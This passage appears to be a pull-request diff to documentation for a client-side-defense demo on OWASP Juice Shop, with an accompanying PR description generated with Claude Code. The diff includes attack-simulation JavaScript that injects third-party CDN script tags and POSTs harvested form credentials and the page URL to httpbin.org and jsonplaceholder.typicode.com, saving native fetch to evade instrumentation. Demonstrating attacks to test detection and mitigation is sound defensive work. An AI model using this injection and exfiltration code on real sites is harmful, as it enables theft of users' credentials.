+        var script = document.createElement('script');
+        script.src = cdn.url;
+        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
+        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
+        document.head.appendChild(script);
+        _log('[Supply Chain] Injected script tag: ' + cdn.name);
+      });
+
+      _log('\n[Exfil] Phase 3: Data exfiltration');
+      var payload = JSON.stringify({
+        type: 'combined_demo', credentials: harvested,
+        page: window.location.href, timestamp: Date.now()
+      });
+      _fetch('https://httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
+        .then(function() { _log('[Exfil] Data sent to httpbin.org'); });
+      _fetch('https://jsonplaceholder.typicode.com/posts', {
+        method: 'POST', mode: 'no-cors',
+        headers: { 'Content-Type': 'application/json' }, body: payload
+      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });
+
+      _log('\n==================================================');
+      _log('[CSD Demo] Simulation complete');
+      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
+      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
+      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
+      _log('==================================================');
+    })();
+  }
+}, 300);
+```
+
+**Note on native `fetch`:** This harness saves `window.fetch.bind(window)` to avoid zone.js errors. This is the correct behavior for Phase 2 (no mitigations active). For Phase 3 Step 5 (after mitigation), use the Phase 3 Step 5 initScript instead — that version does NOT save native `fetch`, allowing CSD to intercept and block exfil calls. See [Phase 3 — Step 5](/csd/api-automation/phase-3-mitigate/#step-5-run-attack--after-mitigation).
 
 <Aside type="caution">
 **zone.js incompatibility** — Juice Shop uses Angular's zone.js, which patches `setTimeout`, `setInterval`, `fetch`, `XMLHttpRequest`, and other browser APIs. This breaks the MCP `evaluate_script`, `fill`, and `click` tools with `Cannot read properties of undefined (reading 'call')`. Use `navigate_page` with `initScript` instead — `initScript` runs before zone.js loads, so you can save native API references. The initScript must fill form fields using the native `HTMLInputElement.prototype.value` setter (not the `fill` tool) and run the detection script inline within the `setInterval` callback.


### PR DESCRIPTION
## Summary

Closes #309

Second documentation debug iteration across all 7 automation doc files. Focus: eliminate every non-deterministic instruction, add missing fallback/escalation paths, add verbatim initScript code blocks, and fix evidence table mismatches.

**Changes by category:**

- **Verbatim initScripts added:** Phase 2 initScript (saves `_si`, `_ci`, `_fetch`, `_log`; uses native fetch for exfil) and Phase 3 Step 5 initScript (identical but omits native `_fetch` so CSD can intercept) — both added to `phase-2-attack.mdx`, `phase-3-mitigate.mdx`, and `trigger-detection.mdx`
- **Deterministic polling loops:** All "wait 5–10 min" replaced with explicit loops (interval × max iterations × escalation path)
- **Fallback paths:** Every verify-after-DELETE now has "wait 30s, re-check once, report to operator if still present"
- **Evidence mismatches fixed:** `ERR_INSUFFICIENT_RESOURCES` → `pending` in Phase 3 manual step 5; `(depends on fetch path)` → accurate `200` explanation in comparison table; `AutoCertIssued` → `CertificateValid` in DEMO_EXECUTOR.md
- **Internal consistency:** DEMO_EXECUTOR.md teardown order now includes Mitigated Domains as step 1 (was present in phase-4-teardown.mdx but missing here)

## Test plan

- [ ] Docs site builds without errors (CI)
- [ ] initScript code blocks in phase-2-attack.mdx, phase-3-mitigate.mdx, trigger-detection.mdx render correctly
- [ ] Phase 4 teardown verify fallbacks are present for all 4 object types
- [ ] DEMO_EXECUTOR.md teardown order lists 7 steps (Mitigated Domains first)
- [ ] Grep for "ERR_INSUFFICIENT_RESOURCES" in instructional context returns zero results

🤖 Generated with [Claude Code](https://claude.com/claude-code)